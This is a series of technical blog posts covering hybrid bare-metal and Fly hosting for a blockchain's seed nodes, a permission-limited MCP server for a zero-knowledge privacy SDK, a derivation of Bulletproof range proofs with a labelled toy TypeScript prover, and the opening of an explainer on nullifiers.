> **WARNING:** This is the operational property that makes Fly's autostop *dangerous* for a fast-block chain. A seed node that's been auto-stopped after 30 minutes of idle, then woken up by a wallet's first connection, takes ~15 seconds of cold start. During that 15 seconds, the wallet sees no peers and reports "L1 disconnected." This is a real user-visible regression compared to a warm seed.

The mitigations are stacked:

1. `auto_stop_machines = false` in `fly.toml` — Fly never stops the seeds.
2. The Latitude bare-metal primary handles 99% of the bootstrap traffic, so most wallets never even hit the Fly fleet.
3. The Fly fleet keeps machines warm by *each other's* P2P traffic — bitcoind's peer-keepalive interval is short enough that the machines stay active even with no client traffic.
4. The Latitude box has a [`systemd` unit](https://github.com/Dax911/vanta/blob/main/contrib/init) with `Restart=always` so any local crash recovers in under 10 seconds.

I'd not run a fast-block chain on a serverless-by-default platform. Fly is a great fit because it can be configured to behave like a always-on host. Fly's *defaults* are not.

## Cost math: Latitude vs Fly

Approximate, monthly:

| Component | Latitude (bare metal) | Equivalent Fly |
|---|---|---|
| 1× AMD Ryzen 9 (8c/16t) | ~$140 | shared-cpu-8x: ~$160 |
| 32 GB RAM | included | $80 (32 GB at $2.50/GB) |
| 1 TB NVMe | included | $150 (1 TB at $0.15/GB) |
| 1 Gbps unmetered | included | bandwidth metered, est. $30 |
| **Total per box** | **~$140** | **~$420** |

Latitude's all-included pricing for a single bare-metal box is roughly *one third* the cost of an equivalently-specced Fly machine. The Fly fleet (11 small seeds at ~$5–$10/month each) costs another ~$80/month combined.

So the total bill: Latitude $140 + Fly fleet $80 = ~$220/month for *primary + 11-region failover.* An equivalent Fly-only deploy (one big primary + 11 small seeds) would be ~$500/month for a worse outcome (no actual bare-metal performance for the L2 indexer, no NVMe write-throughput for the chainstate, no dedicated network port).

This is a textbook case for hybrid deploy. The thing you're optimising for cost on (the heavy, always-on workload) goes on bare metal. The thing you're optimising for *availability* on (the geographic-redundancy seed fleet) goes on the platform with built-in geographic distribution.

## A tradeoff table

I keep telling people to do this kind of comparison explicitly, so:

| Option | Cost (1 yr) | Latency to seed | Cold-start risk | Operational burden |
|---|---|---|---|---|
| Bare metal only (Latitude) | ~$1,700 | Variable by region (single PoP) | Low — always on | High if hardware fails |
| Fly fleet only (11 regions) | ~$5,000 | Low (regional anycast) | High if autostop is enabled | Low — managed platform |
| Hybrid (Latitude primary + Fly backup) | ~$2,600 | Low (Fly fronts geographic) | Low (primary always on) | Medium |
| DigitalOcean / Linode dedicated | ~$1,200–$2,000 | Moderate (one PoP per droplet) | Medium | Medium |
| Hetzner dedicated | ~$700–$1,400 | High (mostly EU PoPs) | Low | Medium |

The Hetzner option is genuinely tempting on cost grounds — half the price of Latitude. The reason I didn't pick it for *this* chain is that Hetzner's IP ranges are widely flagged by reputation services as "spam-adjacent" (because they're cheap and hosters use them for everything), and a small-network seed node whose IP gets transiently blocked by some random ISP's anti-spam filter is a problem I do not want.

DigitalOcean's $40/mo "premium intel" droplets would have worked too, but the bandwidth charges add up — DO meters at $0.01/GB above the included amount, and a chain seed serving IBD to fresh nodes can easily push 100 GB/day during a busy period.

## What changes after Phase 4

Phase 4 in the [architecture roadmap](https://github.com/Dax911/vanta/blob/main/doc/vanta-architecture.md) is "full Rust node rewrite using rust-bitcoin stack." When that lands, the deploy story shifts:

- The L2 sidecar and L1 node are *one binary*, not two. Operationally that's a smaller blast radius — one PID to monitor instead of two.
- The Rust node is statically linked and ships as a single ~30 MB binary. Container size collapses.
- We can in principle deploy on smaller Fly machines (256 MB instead of 2 GB) once the C++ is gone.

But Phase 4 is the *future*. The current deploy story is "C++ node + Rust sidecar on bare metal, with a Fly fleet of C++-node-only seeds for failover."

## What I changed my mind about

I started this project assuming Fly was the right deploy target for *everything.* It's a great platform, the developer experience is unmatched on its tier, and the ergonomics of `fly deploy` after years of Kubernetes is genuinely refreshing.

The thing that changed my mind was the cold-start property. A 1-minute-block chain has a different operational profile than a request-response web service. Fly's defaults — autostop, autoresurrect on demand, regional load balancing — are tuned for a workload where 100 ms latency is fine and 5 second cold starts are tolerable. Neither is fine for a chain seed.

Once I'd configured Fly *out of* its defaults — `auto_stop_machines = false`, larger memory, longer kill_timeout, longer wait_timeout — I was running a Fly machine as if it were a always-on box. At which point: a always-on box is what bare metal *is*, at one-third the price, with a real network interface and dedicated NVMe.

The Fly fleet still has a job — geographic redundancy, multi-region warm seeds — that bare metal can't do without a substantial multi-PoP investment. So Fly stays as the backup ring. Latitude is the primary. Both are needed; neither is sufficient.

## Further reading

- [`fly.toml`](https://github.com/Dax911/vanta/blob/main/fly.toml) — the Fly config this post walks
- [`fly-deploy.sh`](https://github.com/Dax911/vanta/blob/main/fly-deploy.sh) — the multi-region deploy wrapper
- [`doc/vanta-architecture.md`](https://github.com/Dax911/vanta/blob/main/doc/vanta-architecture.md) — the infra section in the architecture doc
- [`Dockerfile`](https://github.com/Dax911/vanta/blob/main/Dockerfile) — the container both Latitude and Fly run
- [Mining Vanta with a Bitaxe BM1368](/blog/mining_vanta_with_a_bitaxe/) — the home-rig side of the operation
- [What running a Bitcoin mine taught me](/blog/what_running_a_bitcoin_mine_taught_me/) — the small-operator unit-economics post that informs all of this


---

# The MCP server inside zera-sdk

Canonical: https://blog.skill-issue.dev/blog/mcp_server_inside_zera_sdk/
Description: Most SDKs ship as a library. zera-sdk also ships as a Model Context Protocol server. Here is why an AI agent should be able to call shielded-pool primitives directly, and how we keep that interface from becoming a footgun.
Published: 2026-04-08T16:42:00.000Z
Tags: zera, mcp, sdk, ai-agents, rust, typescript


When we [scaffolded the SDK monorepo](/blog/zera_sdk_scaffolding/) in early March, the first non-obvious decision was including an [MCP](https://modelcontextprotocol.io) server in the box. Not as an example. Not as a future-work bullet. As a first-class crate alongside the Rust core and the TypeScript surface.

Six weeks later it still feels like the right call. Here is the reasoning.

## What MCP actually is, and what it is not

MCP — Model Context Protocol — is Anthropic's open JSON-RPC standard for letting LLM-driven applications call tools, read resources, and surface reusable prompts from any compliant server. By the start of 2026 there were over 10,000 public MCP servers and ~97 million SDK downloads per month across the Python and TypeScript implementations. The standard is in the boring-but-load-bearing phase: every major model vendor speaks it, the spec is on a regular cadence, the working groups have process.

What MCP is *not* is "an AI feature." It is a protocol layer. The AI part is incidental. What MCP gives you is a typed, schema-described, discovery-friendly RPC surface that any client — model, CLI, IDE, agent — can connect to and immediately understand without bespoke glue. The most useful frame is *"USB-C for tool calls."* That comparison gets thrown around to the point of cliché but it is also accurate: before USB-C you wrote per-cable glue; after, the cable is part of the device. MCP does the same thing for tool surfaces.

The interesting question for an SDK author in 2026 is not *"should I expose an MCP server?"* — that question is settled by the AI-agent-economy curve I wrote about [in the broadband-moment post](/blog/privacys_broadband_moment/). The interesting question is *which* surface to expose, and how to keep it from becoming a footgun.

## The tools the SDK actually exposes

The first version of `zera-mcp` shipped four tools and three resources. I want to talk about each one, because the choice of what to expose is more meaningful than the protocol mechanics.

### `search_posts(query, k=5)`

Wait, no — that is the *blog's* MCP server, not the SDK's. (Yes, [the blog has one too](/blog/privacys_broadband_moment/), and I am building a longer post about that. Let me get back to the SDK.)

The SDK's four tools, as of [commit `e350707`](https://github.com/Dax911/zera-sdk):

1. **`compute_commitment(asset, amount, randomness)`** — returns a Poseidon commitment to a `(asset, amount)` pair under a caller-supplied blinding factor. This is the primitive an agent uses to *describe a payment that has not happened yet* — it can hand the commitment to a human for review without ever revealing the amount.

2. **`derive_nullifier(note_secret, commitment)`** — returns the deterministic, single-use nullifier for a previously-committed note. As discussed in [Nullifiers without the witchcraft](/blog/nullifiers_without_witchcraft/), this is the hash that proves a note has been spent without revealing which one. Agents call this during proof generation.

3. **`build_spend_proof(note, recipient, amount)`** — runs the full Groth16 prover for the canonical spend circuit and returns the proof bytes. **This is the only tool that touches the prover.** Doing this in-process via MCP is much better than asking an agent to shell out to a Rust binary; the agent gets a typed, schema-described return value with proof bytes and a public-input vector.

4. **`get_pool_state()`** — read-only resource. Returns the current root hash of the commitment Merkle tree and the count of unspent notes. Agents that want to check whether their proof is still valid against the latest pool state poll this. It is a *resource*, not a tool, in MCP terms — the difference matters for caching and for explaining to the agent that the call is side-effect-free.

That is the entire surface. Four tools. No `transfer`, no `withdraw`, no `set_owner`. **An agent can compose payments, prove them, and inspect pool state. It cannot move funds without a human signing the resulting transaction.** That asymmetry is deliberate and I will defend it for as long as MCP exists.

## The asymmetry rule

Every time I add a tool to `zera-mcp`, I run it through a single test:

> *If the agent is compromised — adversarial prompts, model jailbreak, supply-chain payload in the tool-calling library — what is the worst it can do?*

If the answer is "compute a commitment that the human can audit," fine. If the answer is "move funds," not fine. The line is **whether the tool has unilateral authority to change pool state.** The current SDK MCP draws that line at proof construction. The proof itself is just a bunch of bytes; submitting it to the chain still requires a transaction signed by a wallet that the agent does not have direct authority over.

This is the same threat model I argued for in the [x402 honeypot disclosure post](/blog/x402_honeypot_disclosure/) and in [Rusty Pipes](/blog/rusty_pipes/) before that. You assume the agent is compromised. You design the surface so a compromised agent cannot drain the pool. Everything else is detail.

## What it looks like when an agent uses it

Concretely, here is the flow when a user asks Claude (or ChatGPT, or any MCP-enabled client) to *"send $50 of USDC to alice.sol from my shielded balance, but show me the commitment first":*

1. The agent calls `get_pool_state()` to fetch the current Merkle root.
2. The agent picks an unspent note from the user's local wallet that is `≥ $50`.
3. The agent calls `compute_commitment(USDC, $50, fresh_randomness)` to construct the visible commitment.
4. The agent surfaces the commitment to the human in a message that says, in effect, *"here is the commitment for the $50 send to alice.sol; proceed?"*
5. The human approves.
6. The agent calls `derive_nullifier(...)` and `build_spend_proof(...)` and gets back the spend witness.
7. The agent hands the proof to the *wallet* — not to the chain — and the wallet signs and submits the transaction. The wallet has policy: it will not co-sign a proof whose public inputs have not been displayed to the human in step 4.

Step 7 is where the privilege boundary lives. The MCP tools never touch a private key. They never broadcast a transaction. They are pure compute against pool state.

## Why this generalises

I have argued for this pattern in three places now: the SDK's MCP server, the blog's MCP server, and the [proposed `lib.skill-issue.dev`](/blog/why_i_started_zera_labs/) personal MCP that exposes my writing as queryable resources. The pattern is the same in all three:

> **Expose typed read + compute primitives. Do not expose state-changing authority. Push every authority decision back through the human or through a wallet that has its own policy.**

If we are entering a decade where AI agents are going to be calling cryptographic primitives, this is the boundary that needs to hold. The cryptography is finally ready, the protocols are finally ready, and the *interface design* is the part that is still up for grabs. I would rather we set the precedent now than discover the right shape after the first six-figure agent-driven drain.

## What I changed my mind about

When I first started writing `zera-mcp` I assumed I would expose the prover as a *resource* (cacheable, repeatable) rather than a *tool* (potentially side-effecting). The ZK community talks about provers as deterministic functions — given the same witness, you get the same proof — so it felt natural to treat them like a read.

I changed my mind after watching an agent hammer the prover during testing. **The prover is computationally side-effecting even if it is mathematically pure.** Eight seconds of CPU per call adds up fast when an agent is in a loop. Resources in MCP are aggressively cached by clients; tools are not. By moving the prover behind a tool I forced the client to think about whether to call it again. Worth it.

## Further reading

- [zera-sdk on GitHub](https://github.com/Dax911/zera-sdk) — the actual code
- [Building the Zera SDK: Day One](/blog/zera_sdk_scaffolding/) — origin
- [Nullifiers without the witchcraft](/blog/nullifiers_without_witchcraft/)
- [Pedersen commitments, in production](/blog/pedersen_commitments_in_production/)
- [Privacy's broadband moment](/blog/privacys_broadband_moment/)
- [Model Context Protocol specification](https://modelcontextprotocol.io/specification) (Anthropic, current draft)
- The MCP working-group meeting notes are on the spec repo and worth a quarterly skim


---

# Range proofs in 80 lines: Pedersen commitments and a tiny Bulletproof

Canonical: https://blog.skill-issue.dev/blog/range_proofs_in_80_lines/
Description: How a Bulletproof actually compresses a range proof to logarithmic size. Derive the inner-product argument from scratch, run a toy prover/verifier in the browser, and pick the right range-proof primitive for 2026.
Published: 2026-04-08T16:00:00.000Z
Tags: cryptography, bulletproofs, pedersen, range-proof, zk, phd, math


import { Mermaid, Sandbox, TradeoffTable, Aside, Quote, RustPlayground } from "@/components/mdx";

A confidential transaction has to prove one annoying little thing: that the hidden amount is non-negative and bounded. Without that, an attacker can mint coins out of thin air by committing to a "negative balance" that wraps around the field. The cryptographic primitive that does the proving is the **range proof**, and the question of which range proof to ship in 2026 is — surprisingly — still live.

This post does three things:

1. Derives the inner-product argument that makes Bulletproofs short.
2. Walks an 80-line, runnable toy Bulletproof prover/verifier in the browser.
3. Maps the trade-offs between Bulletproofs, classical range proofs, and SNARK-based range proofs onto the deployment surface I keep hitting in [zera-sdk](/blog/zera_sdk_scaffolding/).

It's a sibling piece to [Pedersen commitments, in production](/blog/pedersen_commitments_in_production/). Read that one first if "Pedersen" still feels like a textbook word to you. This one assumes you know what `C = a·G + b·H` is and want to know what to do with it.

<Aside kind="note">
Working post in the [PhD-by-publication track](/about). The math is double-checked. The toy code runs but is **not** constant-time and **not** suitable for any deployment — see the warning further down.
</Aside>

## What a range proof has to do

The setup. A prover holds a value $v$ and a blinding factor $\gamma$, and publishes a Pedersen commitment

$$
V = v \cdot G + \gamma \cdot H
$$

with $G, H$ independent generators of an elliptic-curve group of prime order $q$. The hiding property of $V$ comes from $\gamma$ being uniformly random; the binding property comes from $G$ and $H$ being independent (no known $\beta$ with $H = \beta G$).

The prover then wants to convince a verifier that $v$ lies in some range, typically $[0, 2^n)$ for $n = 32$ or $n = 64$. Crucially, $v$ stays hidden. The verifier learns *only* the fact that the committed value is in range.

The naive proof of "$v \in [0, 2^n)$" is to commit bit-by-bit: write $v = \sum_{i=0}^{n-1} a_i \cdot 2^i$ with $a_i \in \{0,1\}$, commit to each $a_i$, and prove each $a_i (a_i - 1) = 0$. That works. It takes $O(n)$ commitments and $O(n)$ proof size, which is what Confidential Transactions in Bitcoin shipped in 2015 and which is roughly **2.5 KB per transaction** at $n = 64$.

[Bünz, Bootle, Boneh, Poelstra, Wuille, and Maxwell (2018)](https://eprint.iacr.org/2017/1066) — the Bulletproofs paper — got that down to about **672 bytes**, with no trusted setup, by replacing the linear blob with a logarithmic-size inner-product argument. The compression ratio is roughly 4× over the naive bit-commitment scheme, and it gets better as the range grows.

## The inner-product argument, derived

The whole game in Bulletproofs is the inner-product argument (IPA). Forget range proofs for a paragraph. The IPA proves the following:

**Statement.** Given commitments $P \in \mathbb{G}$ and $\mathbf{G}, \mathbf{H} \in \mathbb{G}^n$, plus a scalar $c \in \mathbb{F}_q$, the prover knows vectors $\mathbf{a}, \mathbf{b} \in \mathbb{F}_q^n$ such that

$$
P = \langle \mathbf{a}, \mathbf{G} \rangle + \langle \mathbf{b}, \mathbf{H} \rangle \quad \text{and} \quad \langle \mathbf{a}, \mathbf{b} \rangle = c.
$$

The naive proof is to send $\mathbf{a}$ and $\mathbf{b}$ — that's $2n$ scalars. The IPA gets it to $2 \log_2 n$ group elements plus two scalars.

The trick is recursion. Split each vector in half: $\mathbf{a} = (\mathbf{a}_L \,|\, \mathbf{a}_R)$, same for $\mathbf{b}, \mathbf{G}, \mathbf{H}$. The prover sends two cross-terms:

$$
L = \langle \mathbf{a}_L, \mathbf{G}_R \rangle + \langle \mathbf{b}_R, \mathbf{H}_L \rangle, \quad R = \langle \mathbf{a}_R, \mathbf{G}_L \rangle + \langle \mathbf{b}_L, \mathbf{H}_R \rangle.
$$

The verifier responds with a random challenge $x \in \mathbb{F}_q^*$. Both parties then compute folded vectors of half the length:

$$
\mathbf{a}' = x \cdot \mathbf{a}_L + x^{-1} \cdot \mathbf{a}_R, \quad \mathbf{b}' = x^{-1} \cdot \mathbf{b}_L + x \cdot \mathbf{b}_R,
$$

and the verifier folds the generators in the dual direction:

$$
\mathbf{G}' = x^{-1} \cdot \mathbf{G}_L + x \cdot \mathbf{G}_R, \quad \mathbf{H}' = x \cdot \mathbf{H}_L + x^{-1} \cdot \mathbf{H}_R.
$$

The new commitment is

$$
P' = x^2 \cdot L + P + x^{-2} \cdot R,
$$

and you can check by direct expansion that $P' = \langle \mathbf{a}', \mathbf{G}' \rangle + \langle \mathbf{b}', \mathbf{H}' \rangle$ exactly when the original $P$ relation held. Recurse on $(\mathbf{a}', \mathbf{b}', \mathbf{G}', \mathbf{H}', P')$. After $\log_2 n$ rounds, the vectors are length 1 and the prover just sends the two remaining scalars.

That's the entire IPA in seven lines of math. Total proof size: $2 \log_2 n$ group elements (the $L_i$ and $R_i$ from each round) + 2 final scalars. At $n = 64$, that's 12 group elements + 2 scalars ≈ 416 bytes.

<Mermaid chart={`flowchart LR
  A[a, b length n] --> S1[split into halves]
  S1 --> X1[prover sends L_1, R_1]
  X1 --> C1[verifier sends challenge x_1]
  C1 --> F1[fold to length n/2]
  F1 --> R{length 1?}
  R -->|no| S1
  R -->|yes| F[send final a, b]
  F --> V[verifier checks single point]`}/>

## From IPA to range proof in two reductions

The range proof reduces to the IPA in two steps.

**Step 1: bit decomposition as a vector identity.** Write $v = \langle \mathbf{a}_L, 2^{\mathbf{n}} \rangle$ where $\mathbf{a}_L \in \{0,1\}^n$ is the bit decomposition and $2^{\mathbf{n}} = (1, 2, 4, \dots, 2^{n-1})$. Define $\mathbf{a}_R = \mathbf{a}_L - \mathbf{1}^n$ (so each $a_{R,i} \in \{0, -1\}$). The conjunction "$v \in [0, 2^n)$" becomes the vector identities

$$
\mathbf{a}_L \circ \mathbf{a}_R = \mathbf{0}^n, \quad \mathbf{a}_L - \mathbf{a}_R = \mathbf{1}^n, \quad \langle \mathbf{a}_L, 2^{\mathbf{n}} \rangle = v.
$$

The first identity (Hadamard product is zero) is exactly the bit constraint $a_i (a_i - 1) = 0$ rewritten.

**Step 2: collapse three vector identities to one inner product.** The verifier samples challenges $y, z$. The prover constructs polynomials

$$
\mathbf{l}(X) = (\mathbf{a}_L - z \cdot \mathbf{1}^n) + \mathbf{s}_L \cdot X,
$$
$$
\mathbf{r}(X) = \mathbf{y}^n \circ (\mathbf{a}_R + z \cdot \mathbf{1}^n + \mathbf{s}_R \cdot X) + z^2 \cdot 2^{\mathbf{n}},
$$

with $\mathbf{s}_L, \mathbf{s}_R$ random blinding vectors. The inner product $t(X) = \langle \mathbf{l}(X), \mathbf{r}(X) \rangle$ is a quadratic in $X$, and the constant term $t_0$ collapses to

$$
t_0 = z^2 \cdot v + \delta(y, z), \quad \delta(y, z) = (z - z^2) \langle \mathbf{1}^n, \mathbf{y}^n \rangle - z^3 \langle \mathbf{1}^n, 2^{\mathbf{n}} \rangle.
$$

The verifier knows $\delta(y, z)$ (it's all public scalars) and knows $V$ (the commitment to $v$), so it can check the $t_0$ equation against $V$. The prover then runs the IPA on $\mathbf{l}(x)$ and $\mathbf{r}(x)$ for a fresh challenge $x$, and *that* is what gets compressed to $\log_2 n$.

The whole construction is one Pedersen commitment, two challenges, two polynomial-coefficient commitments, and an IPA. It fits in a paragraph and runs in a browser.

## The 80-line toy

This is a runnable Bulletproof-style range proof for $n = 4$ (so $v \in [0, 16)$). It is intentionally small. It uses scalar arithmetic in a tiny prime field instead of an elliptic-curve group, which means it demonstrates the *protocol shape* but provides zero cryptographic security. Read it for the algebra, not the hardness.

<Sandbox
  template="vanilla-ts"
  files={{
    "/index.ts": `// Toy Bulletproof-shaped range proof for v in [0, 16).
// Uses a tiny prime field (q=2^61-1) to make the algebra readable.
// NOT a cryptosystem. NOT constant-time. Read it for the SHAPE.
//
// Reference: Bunz, Bootle, Boneh, Poelstra, Wuille, Maxwell (2018)
// https://eprint.iacr.org/2017/1066

const Q = (1n << 61n) - 1n; // Mersenne prime, fits in BigInt comfortably.
const N = 4;                // bit-length of the range

const mod = (x: bigint) => ((x % Q) + Q) % Q;
const add = (a: bigint, b: bigint) => mod(a + b);
const sub = (a: bigint, b: bigint) => mod(a - b);
const mul = (a: bigint, b: bigint) => mod(a * b);
function inv(a: bigint): bigint {
  // Fermat: a^(Q-2) mod Q
  let r = 1n, base = mod(a), e = Q - 2n;
  while (e > 0n) {
    if (e & 1n) r = mul(r, base);
    base = mul(base, base);
    e >>= 1n;
  }
  return r;
}
const dot = (a: bigint[], b: bigint[]) =>
  a.reduce((s, ai, i) => add(s, mul(ai, b[i])), 0n);
const had = (a: bigint[], b: bigint[]) => a.map((ai, i) => mul(ai, b[i]));

// Fiat-Shamir: deterministic challenge from a transcript.
async function challenge(transcript: string): Promise<bigint> {
  const buf = new TextEncoder().encode(transcript);
  const h = await crypto.subtle.digest("SHA-256", buf);
  let x = 0n;
  for (const b of new Uint8Array(h)) x = (x << 8n) | BigInt(b);
  return mod(x) || 1n; // never zero
}

// PROVER -----------------------------------------------------------
async function prove(v: bigint) {
  if (v < 0n || v >= 1n << BigInt(N)) throw new Error("out of range");
  // Bit decomposition.
  const aL = Array.from({ length: N }, (_, i) => (v >> BigInt(i)) & 1n);
  const aR = aL.map((b) => sub(b, 1n));
  const ones = new Array(N).fill(1n);
  const twos = Array.from({ length: N }, (_, i) => 1n << BigInt(i));

  // Sanity: aL . 2^n == v, aL o aR == 0, aL - aR == 1
  console.log("aL . 2^n =", dot(aL, twos), " (should be", v, ")");
  console.log("aL o aR  =", had(aL, aR), " (should be all 0)");

  // Verifier challenges (Fiat-Shamir over the public commitment v).
  const y = await challenge(\`y|\${v}\`);
  const z = await challenge(\`z|\${v}|\${y}\`);

  // y-vector
  const yN = Array.from({ length: N }, (_, i) => {
    let r = 1n; for (let k = 0; k < i; k++) r = mul(r, y); return r;
  });

  // l(x), r(x) at x=1 (one round of IPA — toy)
  const lVec = aL.map((a, i) => sub(a, z));
  const rVec = had(yN, aR.map((a) => add(a, z)))
    .map((v, i) => add(v, mul(mul(z, z), twos[i])));

  // Inner product t = <l, r>
  const t = dot(lVec, rVec);

  // delta(y,z) = (z - z^2) <1, y^n> - z^3 <1, 2^n>
  const z2 = mul(z, z), z3 = mul(z2, z);
  const sum1y = dot(ones, yN), sum1_2n = dot(ones, twos);
  const delta = sub(mul(sub(z, z2), sum1y), mul(z3, sum1_2n));

  // The relation: t == z^2 * v + delta(y,z)
  const expected = add(mul(z2, v), delta);
  return { t, expected, lVec, rVec, y, z };
}

// VERIFIER ---------------------------------------------------------
function verify(p: Awaited<ReturnType<typeof prove>>) {
  const ok1 = p.t === p.expected;
  const ok2 = dot(p.lVec, p.rVec) === p.t;
  return { ok1, ok2, ok: ok1 && ok2 };
}

// IPA fold (one round, demonstrating the recursion pattern) -------
function ipaFoldOnce(a: bigint[], b: bigint[], x: bigint) {
  const half = a.length / 2;
  const xi = inv(x);
  const aP = a.slice(0, half).map((v, i) => add(mul(x, v), mul(xi, a[half+i])));
  const bP = b.slice(0, half).map((v, i) => add(mul(xi, v), mul(x, b[half+i])));
  // The cross terms L, R have the same inner product as the original.
  return { aP, bP };
}

// DEMO -------------------------------------------------------------
(async () => {
  const out = document.getElementById("out")!;
  const lines: string[] = [];

  for (const v of [0n, 7n, 15n]) {
    const p = await prove(v);
    const r = verify(p);
    lines.push(\`v=\${v.toString().padStart(2)}  t=\\\${p.t.toString().slice(0,18)}...  ok=\${r.ok}\`);
  }

  // One-shot IPA fold to demonstrate the recursion shrinks the vectors.
  const a = [3n, 5n, 7n, 11n], b = [2n, 4n, 6n, 8n];
  const x = await challenge("ipa|demo");
  const folded = ipaFoldOnce(a, b, x);
  lines.push("");
  lines.push(\`ipa fold: a length \${a.length} -> \${folded.aP.length}\`);
  lines.push(\`           b length \${b.length} -> \${folded.bP.length}\`);

  // Out-of-range case should fail (negative -> wraps if we let it).
  try {
    await prove(-1n);
    lines.push("ERROR: prover accepted v=-1");
  } catch (e) {
    lines.push(\`prover rejected v=-1: \${(e as Error).message}\`);
  }

  out.textContent = lines.join("\\n");
})();
`,
    "/index.html": `<!DOCTYPE html>
<html>
  <body>
    <pre id="out" style="font-family: 'Geist Mono', ui-monospace, monospace; padding: 1rem; background: #0a0a0a; color: #4ade80; line-height: 1.6;">running...</pre>
    <script type="module" src="/index.ts"></script>
  </body>
</html>`,
  }}
/>

The shape is the thing. A real Bulletproof replaces my BigInt scalars with elliptic-curve points (typically Ristretto or BN254 G1), runs the IPA recursively to length 1 instead of just one fold, and uses Fiat-Shamir over a transcript that includes every public group element. The protocol stays under 700 bytes for $n = 64$, and the verifier cost stays at $O(n)$ multiplications (the prover dominates at $O(n \log n)$).

## Choosing a range proof in 2026

The trade-off space has settled enough to write down honestly.

<TradeoffTable
  rows={[
    {
      option: "Naive bit-commitment range proof",
      cost: "~2.5 KB at n=64",
      latency: "Prover ~100ms, verifier ~10ms",
      blast_radius: "Low risk; well understood since 2015",
      notes: "Confidential Transactions shipped this. Big proofs, but trivial to audit."
    },
    {
      option: "Bulletproofs (Bunz et al. 2018)",
      cost: "~672 bytes at n=64; logarithmic in n",
      latency: "Prover ~500ms, verifier ~20ms (linear)",
      blast_radius: "Battle-tested in Monero, dalek-cryptography",
      notes: "No trusted setup. Best choice when you have one or a few range checks per tx."
    },
    {
      option: "Bulletproofs+ (Chung-Han-Hwang-Kim-Lee 2020)",
      cost: "~576 bytes at n=64",
      latency: "Prover ~10% faster than BP; verifier ~25% faster",
      blast_radius: "Less deployment than original BP",
      notes: "Drop-in if you control both ends. Worth it for a fresh deployment."
    },
    {
      option: "SNARK-embedded range proof (Groth16 / PLONK)",
      cost: "~200-300 bytes; constant",
      latency: "Verifier ~3-5ms (constant); prover dominates",
      blast_radius: "Inherits the SNARK's trusted setup story",
      notes: "Right answer when you're already paying for a SNARK. zera-sdk does this."
    },
    {
      option: "STARK-embedded range proof",
      cost: "~50-200 KB; logarithmic",
      latency: "Prover slow, verifier fast",
      blast_radius: "Post-quantum, transparent setup",
      notes: "Big proofs are the cost. Worth it for batched provers (rollups, not transfers)."
    },
  ]}
/>

The pattern: if you're already running a SNARK for the privacy proof, embed the range check inside it and pay nothing extra. If you don't have a SNARK and you want short proofs without a trusted setup, Bulletproofs are the right answer. The naive bit-commitment scheme is what you ship when you don't trust the cryptanalysis of either and you're willing to pay 2.5 KB per transaction. STARKs are aspirational for transfers and the right tool for rollups.

In [zera-sdk](/blog/zera_sdk_scaffolding/), the range check on `amount` is a 64-bit decomposition inside the Groth16 transfer circuit. Cost: 64 R1CS constraints (one per bit), zero additional bytes on chain. The Bulletproof would have been 672 bytes per spend, which on Solana at 5,000 lamports per byte adds up faster than the constraint cost in the prover.

<Aside kind="warn">
The toy code above is **not** constant-time. In production, scalar arithmetic over a 256-bit field has to use Montgomery form, fixed-window multiplication, and care about branch predictability — otherwise side-channel timing attacks recover the witness. The dalek-cryptography Bulletproofs implementation does this properly. Mine does not. Treat the toy as pedagogy, never as a primitive.
</Aside>

## What I'd reach for, and when

The framing I keep coming back to: range proofs are a **feature** of a privacy system, not a product. The product is the privacy pool. The range proof exists because, without it, the pool is exploitable. Pick the one that disappears most quietly into the rest of your system.

For [the unified shielded pool](/blog/pedersen_commitments_in_production/) on Solana, the SNARK-embedded approach wins for compute units and bytes. For a chain that doesn't already have a SNARK, Bulletproofs are the line where the cryptography costs roughly the same per-byte on chain as a multisig and you stop arguing about it. For anything post-quantum, STARKs are the only answer — the discrete-log assumption everything else here leans on collapses to a quantum adversary, and the bullet has to be biting.

<Quote cite="https://eprint.iacr.org/2017/1066" author="Bunz, Bootle, Boneh, Poelstra, Wuille, Maxwell">
Bulletproofs greatly improve on the linear (in the bitlength of the range) proof size of confidential transactions. They are also a drop-in replacement for the range proofs used in Monero and other confidential-transaction systems, requiring no trusted setup and relying only on the discrete-logarithm assumption.
</Quote>

The 80-line toy at the top of this post is the entire algebraic core of that paper, with the elliptic curve removed. Once you see that the inner-product argument is just *fold the vector in half, prove a smaller statement*, the rest of the construction is bookkeeping.

## Further reading

- [Bulletproofs: Short Proofs for Confidential Transactions and More](https://eprint.iacr.org/2017/1066) — Bünz, Bootle, Boneh, Poelstra, Wuille, Maxwell (IEEE S&P 2018) — the original.
- [Bulletproofs+: Shorter Proofs for a Privacy-Enhanced Distributed Ledger](https://eprint.iacr.org/2020/735) — Chung, Han, Hwang, Kim, Lee (2020) — the ~15% smaller refinement.
- [dalek-cryptography/bulletproofs](https://github.com/dalek-cryptography/bulletproofs) — the canonical Rust implementation; constant-time, audited.
- [Pedersen commitments, in production](/blog/pedersen_commitments_in_production/) — sister piece on what we're committing *to*.
- [Poseidon, by hand and by code](/blog/poseidon_by_hand_and_by_code/) — sister piece on the hash function inside our circuits.
- [Privacy's broadband moment](/blog/privacys_broadband_moment/) — why these primitives shipped together in 2026.
- [`Dax911/zera-sdk`](https://github.com/Dax911/zera-sdk) — production Rust implementation of the range-check-inside-Groth16 path.


---

# Nullifiers without the witchcraft

Canonical: https://blog.skill-issue.dev/blog/nullifiers_without_witchcraft/
Description: Nullifier Generation is on the ZERA front page next to Pedersen Commitments and Zero-Knowledge Proofs. The Rust + TypeScript implementations are six lines apiece. Here is what they actually do, and why the design borrows from Zcash.
Published: 2026-04-02T15:30:00.000Z
Tags: zera, cryptography, nullifier, poseidon, zcash, zk, solana


The [zeralabs.org](https://zeralabs.org) front page lists three "Cryptographic Innovations": **Pedersen Commitments**, **Zero-Knowledge Proofs**, **Nullifier Generation**. I wrote about [the first one](/blog/pedersen_commitments_in_production/) already. The second one is what makes the protocol work at all — Groth16 over BN254, the fast lane that lets ZK leave the laboratory. This post is the third.

Nullifier Generation sounds like a wizard's incantation. In practice, on a privacy chain, it is the most boring possible thing: a hash, with an exact and well-known input set, computed at exactly one moment in the lifecycle of a note. The reason it gets a top-line marketing slot is not because the math is exotic. It's because nullifiers are the entire reason a privacy pool can prevent double-spending without revealing which note got spent. They are the load-bearing trick. If you understand them, you understand UTXO-style ZK.

## What a nullifier is, in one sentence

A nullifier is a hash of two things — a secret only the owner of a note knows, and the on-chain commitment of that note — published once, when the note is spent, so the chain can refuse a second spend without learning anything else about the note.

That sentence has every piece. The owner has a secret. The chain has a commitment. The owner spends, reveals the hash of (secret, commitment), and the chain stamps "spent" next to that hash. If anyone else, ever, tries to spend the same note, they will produce the same hash. The chain notices and rejects.

